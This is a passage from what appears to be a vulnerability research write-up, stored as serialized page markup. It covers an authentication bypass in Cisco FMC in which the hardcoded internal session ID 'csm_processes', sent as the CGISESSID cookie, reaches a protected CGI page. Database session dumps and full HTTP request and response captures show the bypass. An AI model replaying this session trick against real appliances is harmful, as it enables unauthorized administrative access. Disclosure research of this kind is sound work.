{},",[1471,2448,1524],{"class":1523},[1471,2450,2451],{"class":1527},"VMS_SESSION_ID",[1471,2453,1524],{"class":1523},[1471,2455,1844],{"class":1516},[1471,2457,1569],{"class":1523},[1471,2459,1279],{"class":1527},[1471,2461,1524],{"class":1523},[1471,2463,2298],{"class":1487},[1471,2465,1524],{"class":1523},[1471,2467,2468],{"class":1527},"current_domain",[1471,2470,1524],{"class":1523},[1471,2472,1844],{"class":1516},[1471,2474,1569],{"class":1523},[1471,2476,2312],{"class":1527},[1471,2478,1524],{"class":1523},[1471,2480,2481],{"class":1487},"};;$D |\n",[184,2483,2484,2485,2487,2488,2491],{},"Notably, the ",[1277,2486,1283],{}," database and table are the same locations where valid web UI authentications happen. No other machine accounts appear to have sessions created in this portion of the database, and the only other ",[1277,2489,2490],{},"a_session"," objects that get created are from user web authentication. A few things about the above:",[2493,2494,2495,2504],"ol",{},[230,2496,2497,2499,2500,2503],{},[1277,2498,2411],{}," set to ",[1277,2501,2502],{},"0"," means that the session is active",[230,2505,2506,2499,2508,2510,2511,2514],{},[1277,2507,2321],{},[1277,2509,454],{}," means that the session expiration ",[1374,2512,2513],{},"is"," checked",[184,2516,2517],{},"Additionally, when a user logs into the web UI, normally the session looks like the following:",[1449,2519,2521],{"className":2232,"code":2520,"language":2234,"meta":148,"style":148},"MariaDB [(none)]> SELECT a_session FROM sfsnort.sessions;\n| a_session |\n| $D = {'active' => 0,'last_csm_refresh' => 1774465805,'sf_action_id' => 'a490cd6e67ccde81d131684846d7a13c','original_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','_SESSION_CTIME' => 1774465805,'_SESSION_EXPIRE_LIST' => {'session_expire_check' => 3600},'username' => 'admin','session_expire_check' => 1,'user_access_type' => 'rw','last_login' => {'last_login_time' => 1773962153,'remote_host_ip' => '10.0.1.10'},'useruuid' => '68d03c42-d9bd-11dc-89f2-b7961d42c462','_SESSION_REMOTE_ADDR' => '10.0.1.10','current_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','domains' => '[{\"name\":\"Global\",\"uuid\":\"e276abec-e0f2-11e3-8169-6d9ed49b625f\"}]','_SESSION_ATIME' => 1774465819,'IS_WORKFLOW_MODE' => 'false','VMS_SESSION_ID' => '-1102361566','usertype' => 1,'_SESSION_ID' => '80a3ec54ed31807a655fb7d2018c69cf','_SESSION_ETIME' => 3900};;$D |\n| $D = {'_SESSION_ATIME' => 1774465771,'original_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','useruuid' => '8acb8f4a-c40d-11e3-95aa-54f999c07ac9','current_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','_SESSION_EXPIRE_LIST' => {},'usertype' => 2,'_SESSION_CTIME' => 1774465771,'active' => 0,'_SESSION_ID' => 'csm_processes','VMS_SESSION_ID' => 'csm_processes','session_expire_check' => 1,'_SESSION_REMOTE_ADDR' => '','username' => 'csm_processes'};;$D |\n",[1277,2522,2523,2543,2548,2899],{"__ignoreMap":148},[1471,2524,2525,2527,2529,2531,2533,2535,2537,2539,2541],{"class":1473,"line":1474},[1471,2526,2241],{"class":1487},[1471,2528,2244],{"class":1516},[1471,2530,2248],{"class":2247},[1471,2532,2251],{"class":1487},[1471,2534,2254],{"class":2247},[1471,2536,2258],{"class":2257},[1471,2538,1201],{"class":1487},[1471,2540,2263],{"class":2257},[1471,2542,1770],{"class":1487},[1471,2544,2545],{"class":1473,"line":149},[1471,2546,2547],{"class":1487},"| a_session |\n",[1471,2549,2550,2552,2554,2556,2558,2560,2562,2564,2566,2568,2570,2573,2575,2577,2580,2582,2584,2586,2588,2590,2592,2595,2597,2599,2601,2603,2605,2607,2609,2611,2613,2615,2617,2619,2621,2623,2625,2627,2629,2631,2633,2635,2637,2639,2641,2643,2645,2648,2651,2653,2655,2657,2659,2661,2664,2666,2668,2670,2672,2674,2676,2678,2680,2682,2685,2687,2689,2691,2694,2696,2698,2700,2703,2705,2707,2709,2711,2714,2716,2718,2721,2723,2725,2728,2730,2732,2734,2737,2739,2741,2743,2745,2747,2749,2751,2754,2756,2758,2760,2762,2764,2766,2768,2770,2772,2774,2776,2778,2780,2782,2784,2786,2788,2790,2792,2795,2797,2799,2801,2804,2806,2808,2810,2812,2814,2816,2819,2821,2823,2826,2828,2830,2832,2835,2837,2839,2841,2843,2845,2847,2849,2852,2854,2856,2858,2860,2862,2864,2866,2868,2870,2872,2874,2876,2878,2881,2883,2885,2887,2890,2892,2894,2897],{"class":1473,"line":1498},[1471,2551,2275],{"class":1487},[1471,2553,2278],{"class":1516},[1471,2555,2281],{"class":1487},[1471,2557,1524],{"class":1523},[1471,2559,2411],{"class":1527},[1471,2561,1524],{"class":1523},[1471,2563,1844],{"class":1516},[1471,2565,2418],{"class":2328},[1471,2567,2298],{"class":1487},[1471,2569,1524],{"class":1523},[1471,2571,2572],{"class":1527},"last_csm_refresh",[1471,2574,1524],{"class":1523},[1471,2576,1844],{"class":1516},[1471,2578,2579],{"class":2328}," 1774465805",[1471,2581,2298],{"class":1487},[1471,2583,1524],{"class":1523},[1471,2585,1306],{"class":1527},[1471,2587,1524],{"class":1523},[1471,2589,1844],{"class":1516},[1471,2591,1569],{"class":1523},[1471,2593,2594],{"class":1527},"a490cd6e67ccde81d131684846d7a13c",[1471,2596,1524],{"class":1523},[1471,2598,2298],{"class":1487},[1471,2600,1524],{"class":1523},[1471,2602,2303],{"class":1527},[1471,2604,1524],{"class":1523},[1471,2606,1844],{"class":1516},[1471,2608,1569],{"class":1523},[1471,2610,2312],{"class":1527},[1471,2612,1524],{"class":1523},[1471,2614,2298],{"class":1487},[1471,2616,1524],{"class":1523},[1471,2618,2367],{"class":1527},[1471,2620,1524],{"class":1523},[1471,2622,1844],{"class":1516},[1471,2624,2579],{"class":2328},[1471,2626,2298],{"class":1487},[1471,2628,1524],{"class":1523},[1471,2630,2439],{"class":1527},[1471,2632,1524],{"class":1523},[1471,2634,1844],{"class":1516},[1471,2636,2281],{"class":1487},[1471,2638,1524],{"class":1523},[1471,2640,2321],{"class":1527},[1471,2642,1524],{"class":1523},[1471,2644,1844],{"class":1516},[1471,2646,2647],{"class":2328}," 3600",[1471,2649,2650],{"class":1487},"},",[1471,2652,1524],{"class":1523},[1471,2654,1726],{"class":1527},[1471,2656,1524],{"class":1523},[1471,2658,1844],{"class":1516},[1471,2660,1569],{"class":1523},[1471,2662,2663],{"class":1527},"admin",[1471,2665,1524],{"class":1523},[1471,2667,2298],{"class":1487},[1471,2669,1524],{"class":1523},[1471,2671,2321],{"class":1527},[1471,2673,1524],{"class":1523},[1471,2675,1844],{"class":1516},[1471,2677,2329],{"class":2328},[1471,2679,2298],{"class":1487},[1471,2681,1524],{"class":1523},[1471,2683,2684],{"class":1527},"user_access_type",[1471,2686,1524],{"class":1523},[1471,2688,1844],{"class":1516},[1471,2690,1569],{"class":1523},[1471,2692,2693],{"class":1527},"rw",[1471,2695,1524],{"class":1523},[1471,2697,2298],{"class":1487},[1471,2699,1524],{"class":1523},[1471,2701,2702],{"class":1527},"last_login",[1471,2704,1524],{"class":1523},[1471,2706,1844],{"class":1516},[1471,2708,2281],{"class":1487},[1471,2710,1524],{"class":1523},[1471,2712,2713],{"class":1527},"last_login_time",[1471,2715,1524],{"class":1523},[1471,2717,1844],{"class":1516},[1471,2719,2720],{"class":2328}," 1773962153",[1471,2722,2298],{"class":1487},[1471,2724,1524],{"class":1523},[1471,2726,2727],{"class":1527},"remote_host_ip",[1471,2729,1524],{"class":1523},[1471,2731,1844],{"class":1516},[1471,2733,1569],{"class":1523},[1471,2735,2736],{"class":1527},"10.0.1.10",[1471,2738,1524],{"class":1523},[1471,2740,2650],{"class":1487},[1471,2742,1524],{"class":1523},[1471,2744,2336],{"class":1527},[1471,2746,1524],{"class":1523},[1471,2748,1844],{"class":1516},[1471,2750,1569],{"class":1523},[1471,2752,2753],{"class":1527},"68d03c42-d9bd-11dc-89f2-b7961d42c462",[1471,2755,1524],{"class":1523},[1471,2757,2298],{"class":1487},[1471,2759,1524],{"class":1523},[1471,2761,2425],{"class":1527},[1471,2763,1524],{"class":1523},[1471,2765,1844],{"class":1516},[1471,2767,1569],{"class":1523},[1471,2769,2736],{"class":1527},[1471,2771,1524],{"class":1523},[1471,2773,2298],{"class":1487},[1471,2775,1524],{"class":1523},[1471,2777,2468],{"class":1527},[1471,2779,1524],{"class":1523},[1471,2781,1844],{"class":1516},[1471,2783,1569],{"class":1523},[1471,2785,2312],{"class":1527},[1471,2787,1524],{"class":1523},[1471,2789,2298],{"class":1487},[1471,2791,1524],{"class":1523},[1471,2793,2794],{"class":1527},"domains",[1471,2796,1524],{"class":1523},[1471,2798,1844],{"class":1516},[1471,2800,1569],{"class":1523},[1471,2802,2803],{"class":1527},"[{\"name\":\"Global\",\"uuid\":\"e276abec-e0f2-11e3-8169-6d9ed49b625f\"}]",[1471,2805,1524],{"class":1523},[1471,2807,2298],{"class":1487},[1471,2809,1524],{"class":1523},[1471,2811,2381],{"class":1527},[1471,2813,1524],{"class":1523},[1471,2815,1844],{"class":1516},[1471,2817,2818],{"class":2328}," 1774465819",[1471,2820,2298],{"class":1487},[1471,2822,1524],{"class":1523},[1471,2824,2825],{"class":1527},"IS_WORKFLOW_MODE",[1471,2827,1524],{"class":1523},[1471,2829,1844],{"class":1516},[1471,2831,1569],{"class":1523},[1471,2833,2834],{"class":1527},"false",[1471,2836,1524],{"class":1523},[1471,2838,2298],{"class":1487},[1471,2840,1524],{"class":1523},[1471,2842,2451],{"class":1527},[1471,2844,1524],{"class":1523},[1471,2846,1844],{"class":1516},[1471,2848,1569],{"class":1523},[1471,2850,2851],{"class":1527},"-1102361566",[1471,2853,1524],{"class":1523},[1471,2855,2298],{"class":1487},[1471,2857,1524],{"class":1523},[1471,2859,1528],{"class":1527},[1471,2861,1524],{"class":1523},[1471,2863,1844],{"class":1516},[1471,2865,2329],{"class":2328},[1471,2867,2298],{"class":1487},[1471,2869,1524],{"class":1523},[1471,2871,2394],{"class":1527},[1471,2873,1524],{"class":1523},[1471,2875,1844],{"class":1516},[1471,2877,1569],{"class":1523},[1471,2879,2880],{"class":1527},"80a3ec54ed31807a655fb7d2018c69cf",[1471,2882,1524],{"class":1523},[1471,2884,2298],{"class":1487},[1471,2886,1524],{"class":1523},[1471,2888,2889],{"class":1527},"_SESSION_ETIME",[1471,2891,1524],{"class":1523},[1471,2893,1844],{"class":1516},[1471,2895,2896],{"class":2328}," 3900",[1471,2898,2481],{"class":1487},[1471,2900,2901,2903,2905,2907,2909,2911,2913,2915,2918,2920,2922,2924,2926,2928,2930,2932,2934,2936,2938,2940,2942,2944,2946,2948,2950,2952,2954,2956,2958,2960,2962,2964,2966,2968,2970,2972,2974,2976,2978,2980,2982,2984,2986,2988,2990,2992,2994,2996,2998,3000,3002,3004,3006,3008,3010,3012,3014,3016,3018,3020,3022,3024,3026,3028,3030,3032,3034,3036,3038,3040,3042,3044,3046,3048,3050,3052,3054,3056,3058,3060,3062,3064,3066,3068,3070,3072,3074,3076,3078,3080,3082,3084],{"class":1473,"line":1536},[1471,2902,2275],{"class":1487},[1471,2904,2278],{"class":1516},[1471,2906,2281],{"class":1487},[1471,2908,1524],{"class":1523},[1471,2910,2381],{"class":1527},[1471,2912,1524],{"class":1523},[1471,2914,1844],{"class":1516},[1471,2916,2917],{"class":2328}," 1774465771",[1471,2919,2298],{"class":1487},[1471,2921,1524],{"class":1523},[1471,2923,2303],{"class":1527},[1471,2925,1524],{"class":1523},[1471,2927,1844],{"class":1516},[1471,2929,1569],{"class":1523},[1471,2931,2312],{"class":1527},[1471,2933,1524],{"class":1523},[1471,2935,2298],{"class":1487},[1471,2937,1524],{"class":1523},[1471,2939,2336],{"class":1527},[1471,2941,1524],{"class":1523},[1471,2943,1844],{"class":1516},[1471,2945,1569],{"class":1523},[1471,2947,2345],{"class":1527},[1471,2949,1524],{"class":1523},[1471,2951,2298],{"class":1487},[1471,2953,1524],{"class":1523},[1471,2955,2468],{"class":1527},[1471,2957,1524],{"class":1523},[1471,2959,1844],{"class":1516},[1471,2961,1569],{"class":1523},[1471,2963,2312],{"class":1527},[1471,2965,1524],{"class":1523},[1471,2967,2298],{"class":1487},[1471,2969,1524],{"class":1523},[1471,2971,2439],{"class":1527},[1471,2973,1524],{"class":1523},[1471,2975,1844],{"class":1516},[1471,2977,2446],{"class":1487},[1471,2979,1524],{"class":1523},[1471,2981,1528],{"class":1527},[1471,2983,1524],{"class":1523},[1471,2985,1844],{"class":1516},[1471,2987,2360],{"class":2328},[1471,2989,2298],{"class":1487},[1471,2991,1524],{"class":1523},[1471,2993,2367],{"class":1527},[1471,2995,1524],{"class":1523},[1471,2997,1844],{"class":1516},[1471,2999,2917],{"class":2328},[1471,3001,2298],{"class":1487},[1471,3003,1524],{"class":1523},[1471,3005,2411],{"class":1527},[1471,3007,1524],{"class":1523},[1471,3009,1844],{"class":1516},[1471,3011,2418],{"class":2328},[1471,3013,2298],{"class":1487},[1471,3015,1524],{"class":1523},[1471,3017,2394],{"class":1527},[1471,3019,1524],{"class":1523},[1471,3021,1844],{"class":1516},[1471,3023,1569],{"class":1523},[1471,3025,1279],{"class":1527},[1471,3027,1524],{"class":1523},[1471,3029,2298],{"class":1487},[1471,3031,1524],{"class":1523},[1471,3033,2451],{"class":1527},[1471,3035,1524],{"class":1523},[1471,3037,1844],{"class":1516},[1471,3039,1569],{"class":1523},[1471,3041,1279],{"class":1527},[1471,3043,1524],{"class":1523},[1471,3045,2298],{"class":1487},[1471,3047,1524],{"class":1523},[1471,3049,2321],{"class":1527},[1471,3051,1524],{"class":1523},[1471,3053,1844],{"class":1516},[1471,3055,2329],{"class":2328},[1471,3057,2298],{"class":1487},[1471,3059,1524],{"class":1523},[1471,3061,2425],{"class":1527},[1471,3063,1524],{"class":1523},[1471,3065,1844],{"class":1516},[1471,3067,2432],{"class":1523},[1471,3069,2298],{"class":1487},[1471,3071,1524],{"class":1523},[1471,3073,1726],{"class":1527},[1471,3075,1524],{"class":1523},[1471,3077,1844],{"class":1516},[1471,3079,1569],{"class":1523},[1471,3081,1279],{"class":1527},[1471,3083,1524],{"class":1523},[1471,3085,2481],{"class":1487},[184,3087,3088],{},"This shows that a few more things are missing or different between the machine user authentication and the admin user authentication:",[227,3090,3091,3103],{},[230,3092,3093,1925,3095,1925,3097,3099,3100,3102],{},[1277,3094,2684],{},[1277,3096,1306],{},[1277,3098,2794],{},", and more are not present in the ",[1277,3101,1279],{}," session object.",[230,3104,3105,3106,3108,3109],{},"Some of the values appear to differ in content type, notably ",[1277,3107,2394],{}," parameters and ",[1277,3110,2394],{},[184,3112,3113,3114,3116,3117,3120,3121,3124,3125,3128],{},"The most interesting part for now is that the ",[1277,3115,2394],{}," value corresponds to the web UI admin user’s ",[1277,3118,3119],{},"CGISESSID=80a3ec54ed31807a655fb7d2018c69cf"," cookie value and is generated dynamically for normal user authentication. Immediately, we attempt to set ",[1277,3122,3123],{},"CGISESSID"," to be ",[1277,3126,3127],{},"CGISESSID=csm_processes"," in order to correspond to the startup process value.",[184,3130,3131,3132,3135],{},"Sure enough, a request to the ",[1277,3133,3134],{},"\u002Fhelp\u002Fabout.cgi"," CGI endpoint without a cookie set returns an invalid session error:",[1449,3137,3141],{"className":3138,"code":3139,"language":3140,"meta":148,"style":148},"language-http shiki shiki-themes material-theme-lighter github-light github-dark monokai","GET \u002Fhelp\u002Fabout.cgi HTTP\u002F1.1\nHost: 10.0.0.226\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive\n\n\n","http",[1277,3142,3143,3159,3170,3180,3190],{"__ignoreMap":148},[1471,3144,3145,3148,3151,3154,3156],{"class":1473,"line":1474},[1471,3146,3147],{"class":1483},"GET",[1471,3149,3150],{"class":1487}," \u002Fhelp\u002Fabout.cgi ",[1471,3152,3153],{"class":2247},"HTTP",[1471,3155,55],{"class":1487},[1471,3157,3158],{"class":2328},"1.1\n",[1471,3160,3161,3165,3167],{"class":1473,"line":149},[1471,3162,3164],{"class":3163},"sHsBP","Host",[1471,3166,1447],{"class":2247},[1471,3168,3169],{"class":1527}," 10.0.0.226\n",[1471,3171,3172,3175,3177],{"class":1473,"line":1498},[1471,3173,3174],{"class":3163},"User-Agent",[1471,3176,1447],{"class":2247},[1471,3178,3179],{"class":1527}," Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\n",[1471,3181,3182,3185,3187],{"class":1473,"line":1536},[1471,3183,3184],{"class":3163},"Accept-Encoding",[1471,3186,1447],{"class":2247},[1471,3188,3189],{"class":1527}," gzip, deflate, br\n",[1471,3191,3192,3195,3197],{"class":1473,"line":1546},[1471,3193,3194],{"class":3163},"Connection",[1471,3196,1447],{"class":2247},[1471,3198,3199],{"class":1527}," keep-alive\n",[1449,3201,3203],{"className":3138,"code":3202,"language":3140,"meta":148,"style":148},"HTTP\u002F1.1 302 Found\nDate: Wed, 25 Mar 2026 19:30:07 GMT\nServer: Mojolicious (Perl)\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nContent-Type: text\u002Fplain; charset=utf-8\nLocation: \u002Fui\u002Flogin?target=%2Fmojo-async%2Fhelp%2Fabout.cgi\nContent-Length: 19\nCache-Control: no-store\nX-Frame-Options: SAMEORIGIN\nX-UA-Compatible: IE=edge\nX-Permitted-Cross-Domain-Policies: none\nX-XSS-Protection: 1; mode=block\nReferrer-Policy: same-origin\nContent-Security-Policy: base-uri 'self'; frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\n\nInvalid session ID \n",[1277,3204,3205,3220,3230,3240,3250,3260,3270,3280,3290,3300,3310,3320,3330,3340,3350,3360,3370,3379,3384],{"__ignoreMap":148},[1471,3206,3207,3209,3211,3214,3217],{"class":1473,"line":1474},[1471,3208,3153],{"class":2247},[1471,3210,55],{"class":1487},[1471,3212,3213],{"class":2328},"1.1",[1471,3215,3216],{"class":2328}," 302",[1471,3218,3219],{"class":1527}," Found\n",[1471,3221,3222,3225,3227],{"class":1473,"line":149},[1471,3223,3224],{"class":3163},"Date",[1471,3226,1447],{"class":2247},[1471,3228,3229],{"class":1527}," Wed, 25 Mar 2026 19:30:07 GMT\n",[1471,3231,3232,3235,3237],{"class":1473,"line":1498},[1471,3233,3234],{"class":3163},"Server",[1471,3236,1447],{"class":2247},[1471,3238,3239],{"class":1527}," Mojolicious (Perl)\n",[1471,3241,3242,3245,3247],{"class":1473,"line":1536},[1471,3243,3244],{"class":3163},"Strict-Transport-Security",[1471,3246,1447],{"class":2247},[1471,3248,3249],{"class":1527}," max-age=31536000; includeSubDomains\n",[1471,3251,3252,3255,3257],{"class":1473,"line":1546},[1471,3253,3254],{"class":3163},"Content-Type",[1471,3256,1447],{"class":2247},[1471,3258,3259],{"class":1527}," text\u002Fplain; charset=utf-8\n",[1471,3261,3262,3265,3267],{"class":1473,"line":1580},[1471,3263,3264],{"class":3163},"Location",[1471,3266,1447],{"class":2247},[1471,3268,3269],{"class":1527}," \u002Fui\u002Flogin?target=%2Fmojo-async%2Fhelp%2Fabout.cgi\n",[1471,3271,3272,3275,3277],{"class":1473,"line":1612},[1471,3273,3274],{"class":3163},"Content-Length",[1471,3276,1447],{"class":2247},[1471,3278,3279],{"class":1527}," 19\n",[1471,3281,3282,3285,3287],{"class":1473,"line":1624},[1471,3283,3284],{"class":3163},"Cache-Control",[1471,3286,1447],{"class":2247},[1471,3288,3289],{"class":1527}," no-store\n",[1471,3291,3292,3295,3297],{"class":1473,"line":1648},[1471,3293,3294],{"class":3163},"X-Frame-Options",[1471,3296,1447],{"class":2247},[1471,3298,3299],{"class":1527}," SAMEORIGIN\n",[1471,3301,3302,3305,3307],{"class":1473,"line":1654},[1471,3303,3304],{"class":3163},"X-UA-Compatible",[1471,3306,1447],{"class":2247},[1471,3308,3309],{"class":1527}," IE=edge\n",[1471,3311,3312,3315,3317],{"class":1473,"line":1662},[1471,3313,3314],{"class":3163},"X-Permitted-Cross-Domain-Policies",[1471,3316,1447],{"class":2247},[1471,3318,3319],{"class":1527}," none\n",[1471,3321,3322,3325,3327],{"class":1473,"line":1673},[1471,3323,3324],{"class":3163},"X-XSS-Protection",[1471,3326,1447],{"class":2247},[1471,3328,3329],{"class":1527}," 1; mode=block\n",[1471,3331,3332,3335,3337],{"class":1473,"line":1681},[1471,3333,3334],{"class":3163},"Referrer-Policy",[1471,3336,1447],{"class":2247},[1471,3338,3339],{"class":1527}," same-origin\n",[1471,3341,3342,3345,3347],{"class":1473,"line":1691},[1471,3343,3344],{"class":3163},"Content-Security-Policy",[1471,3346,1447],{"class":2247},[1471,3348,3349],{"class":1527}," base-uri 'self'; frame-ancestors 'self'\n",[1471,3351,3352,3355,3357],{"class":1473,"line":1699},[1471,3353,3354],{"class":3163},"X-Content-Type-Options",[1471,3356,1447],{"class":2247},[1471,3358,3359],{"class":1527}," nosniff\n",[1471,3361,3362,3365,3367],{"class":1473,"line":1705},[1471,3363,3364],{"class":3163},"Keep-Alive",[1471,3366,1447],{"class":2247},[1471,3368,3369],{"class":1527}," timeout=5, max=100\n",[1471,3371,3372,3374,3376],{"class":1473,"line":1733},[1471,3373,3194],{"class":3163},[1471,3375,1447],{"class":2247},[1471,3377,3378],{"class":1527}," Keep-Alive\n",[1471,3380,3381],{"class":1473,"line":1773},[1471,3382,3383],{"emptyLinePlaceholder":54},"\n",[1471,3385,3386],{"class":1473,"line":1789},[1471,3387,3388],{"class":1487},"Invalid session ID\n",[184,3390,3391,3392,3394,3395,3398],{},"But, with our special ",[1277,3393,1279],{}," session ID, we reach the page and get a HTTP ",[1277,3396,3397],{},"200"," response, and the system data renders:",[1449,3400,3402],{"className":3138,"code":3401,"language":3140,"meta":148,"style":148},"GET \u002Fhelp\u002Fabout.cgi HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive\n\n\n",[1277,3403,3404,3416,3424,3434,3442,3450],{"__ignoreMap":148},[1471,3405,3406,3408,3410,3412,3414],{"class":1473,"line":1474},[1471,3407,3147],{"class":1483},[1471,3409,3150],{"class":1487},[1471,3411,3153],{"class":2247},[1471,3413,55],{"class":1487},[1471,3415,3158],{"class":2328},[1471,3417,3418,3420,3422],{"class":1473,"line":149},[1471,3419,3164],{"class":3163},[1471,3421,1447],{"class":2247},[1471,3423,3169],{"class":1527},[1471,3425,3426,3429,3431],{"class":1473,"line":1498},[1471,3427,3428],{"class":3163},"Cookie",[1471,3430,1447],{"class":2247},[1471,3432,3433],{"class":1527}," CGISESSID=csm_processes\n",[1471,3435,3436,3438,3440],{"class":1473,"line":1536},[1471,3437,3174],{"class":3163},[1471,3439,1447],{"class":2247},[1471,3441,3179],{"class":1527},[1471,3443,3444,3446,3448],{"class":1473,"line":1546},[1471,3445,3184],{"class":3163},[1471,3447,1447],{"class":2247},[1471,3449,3189],{"class":1527},[1471,3451,3452,3454,3456],{"class":1473,"line":1580},[1471,3453,3194],{"class":3163},[1471,3455,1447],{"class":2247},[1471,3457,3199],{"class":1527},[1449,3459,3461],{"className":3138,"code":3460,"language":3140,"meta":148,"style":148},"HTTP\u002F1.1 200 OK\nDate: Wed, 25 Mar 2026 19:28:23 GMT\nServer: Mojolicious (Perl)\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nVary: Accept-Encoding\nCache-Control: no-store\nX-Frame-Options: SAMEORIGIN\nX-UA-Compatible: IE=edge\nX-Permitted-Cross-Domain-Policies: none\nX-XSS-Protection: 1; mode=block\nReferrer-Policy: same-origin\nContent-Security-Policy: base-uri 'self'; frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nContent-Length: 25555\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nContent-Type: text\u002Fhtml; charset=utf-8\n\n\u003C!DOCTYPE html>\n\n\n\n...snip...\n",[1277,3462,3463,3477,3486,3494,3502,3512,3520,3528,3536,3544,3552,3560,3568,3576,3585,3593,3601,3610,3614,3629,3633,3637,3642],{"__ignoreMap":148},[1471,3464,3465,3467,3469,3471,3474],{"class":1473,"line":1474},[1471,3466,3153],{"class":2247},[1471,3468,55],{"class":1487},[1471,3470,3213],{"class":2328},[1471,3472,3473],{"class":2328}," 200",[1471,3475,3476],{"class":1527}," OK\n",[1471,3478,3479,3481,3483],{"class":1473,"line":149},[1471,3480,3224],{"class":3163},[1471,3482,1447],{"class":2247},[1471,3484,3485],{"class":1527}," Wed, 25 Mar 2026 19:28:23 GMT\n",[1471,3487,3488,3490,3492],{"class":1473,"line":1498},[1471,3489,3234],{"class":3163},[1471,3491,1447],{"class":2247},[1471,3493,3239],{"class":1527},[1471,3495,3496,3498,3500],{"class":1473,"line":1536},[1471,3497,3244],{"class":3163},[1471,3499,1447],{"class":2247},[1471,3501,3249],{"class":1527},[1471,3503,3504,3507,3509],{"class":1473,"line":1546},[1471,3505,3506],{"class":3163},"Vary",[1471,3508,1447],{"class":2247},[1471,3510,3511],{"class":1527}," Accept-Encoding\n",[1471,3513,3514,3516,3518],{"class":1473,"line":1580},[1471,3515,3284],{"class":3163},[1471,3517,1447],{"class":2247},[1471,3519,3289],{"class":1527},[1471,3521,3522,3524,3526],{"class":1473,"line":1612},[1471,3523,3294],{"class":3163},[1471,3525,1447],{"class":2247},[1471,3527,3299],{"class":1527},[1471,3529,3530,3532,3534],{"class":1473,"line":1624},[1471,3531,3304],{"class":3163},[1471,3533,1447],{"class":2247},[1471,3535,3309],{"class":1527},[1471,3537,3538,3540,3542],{"class":1473,"line":1648},[1471,3539,3314],{"class":3163},[1471,3541,1447],{"class":2247},[1471,3543,3319],{"class":1527},[1471,3545,3546,3548,3550],{"class":1473,"line":1654},[1471,3547,3324],{"class":3163},[1471,3549,1447],{"class":2247},[1471,3551,3329],{"class":1527},[1471,3553,3554,3556,3558],{"class":1473,"line":1662},[1471,3555,3334],{"class":3163},[1471,3557,1447],{"class":2247},[1471,3559,3339],{"class":1527},[1471,3561,3562,3564,3566],{"class":1473,"line":1673},[1471,3563,3344],{"class":3163},[1471,3565,1447],{"class":2247},[1471,3567,3349],{"class":1527},[1471,3569,3570,3572,3574],{"class":1473,"line":1681},[1471,3571,3354],{"class":3163},[1471,3573,1447],{"class":2247},[1471,3575,3359],{"class":1527},[1471,3577,3578,3580,3582],{"class":1473,"line":1691},[1471,3579,3274],{"class":3163},[1471,3581,1447],{"class":2247},[1471,3583,3584],{"class":1527}," 25555\n",[1471,3586,3587,3589,3591],{"class":1473,"line":1699},[1471,3588,3364],{"class":3163},[1471,3590,1447],{"class":2247},[1471,3592,3369],{"class":1527},[1471,3594,3595,3597,3599],{"class":1473,"line":1705},[1471,3596,3194],{"class":3163},[1471,3598,1447],{"class":2247},[1471,3600,3378],{"class":1527},[1471,3602,3603,3605,3607],{"class":1473,"line":1733},[1471,3604,3254],{"class":3163},[1471,3606,1447],{"class":2247},[1471,3608,3609],{"class":1527}," text\u002Fhtml; charset=utf-8\n",[1471,3611,3612],{"class":1473,"line":1773},[1471,3613,3383],{"emptyLinePlaceholder":54},[1471,3615,3616,3619,3622,3626],{"class":1473,"line":1789},[1471,3617,3618],{"class":1491},"\u003C!",[1471,3620,3621],{"class":2247},"DOCTYPE",[1471,3623,3625],{"class":3624},"sSsL9"," html",[1471,3627,3628],{"class":1491},">\n",[1471,3630,3631],{"class":1473,"line":1805},[1471,3632,3383],{"emptyLinePlaceholder":54},[1471,3634,3635],{"class":1473,"line":50},[1471,3636,3383],{"emptyLinePlaceholder":54},[1471,3638,3640],{"class":1473,"line":3639},22,[1471,3641,3383],{"emptyLinePlaceholder":54},[1471,3643,3645],{"class":1473,"line":3644},23,[1471,3646,3647],{"class":1487},"...snip...\n",[184,3649,3650],{},[187,3651],{"alt":3652,"src":3653},"Authentication bypass for the auth dialogue.","\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079\u002Fhelp-dialog.png",[184,3655,3656],{},"Sweet! It appears we found the issue, and it looks to be as easy as using a hardcoded session. Now we can just set our cookie to that value and try and reach any of the pages.... and every page functionally triggers the following error:",[184,3658,3659],{},[187,3660],{"alt":3661,"src":3662},"Authentication failing on most pages.","\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079\u002Fui-failure.png",[246,3664,3666],{"id":3665},"its-never-that-easy","It's Never That Easy",[184,3668,3669],{},"Using the hardcoded session and reaching for any of the endpoints triggers errors in the log similar to the following:",[1449,3671,3674],{"className":3672,"code":3673,"language":1454},[1452],"[2026-03-25 19:41:00.32860] [14601] [debug] 200 OK (2.203898s, 0.454\u002Fs)\n[2026-03-25 19:41:00.32865] [14601] [debug] after dispatch worker inspection\n[2026-03-25 19:41:46.03099] [14601] [debug] Resetting modules...\n[2026-03-25 19:41:46.03807] [14601] [debug] Module reset complete\n[2026-03-25 19:41:46.03828] [14601] [debug] GET \"\u002Fplatinum\u002FApplianceInformation.cgi\" (27828f1b)\n[2026-03-25 19:41:46.03841] [14601] [debug] Routing to controller \"SF::Mojo::Handlers::ApplianceInformationHandler\" and action \"mojo_handler\"\n[2026-03-25 19:41:46.03895] [14601] [info] handle_auth: Trying to connect to \u002Fplatinum\u002FApplianceInformation.cgi\n[2026-03-25 19:41:46.04650] [14601] [info] User 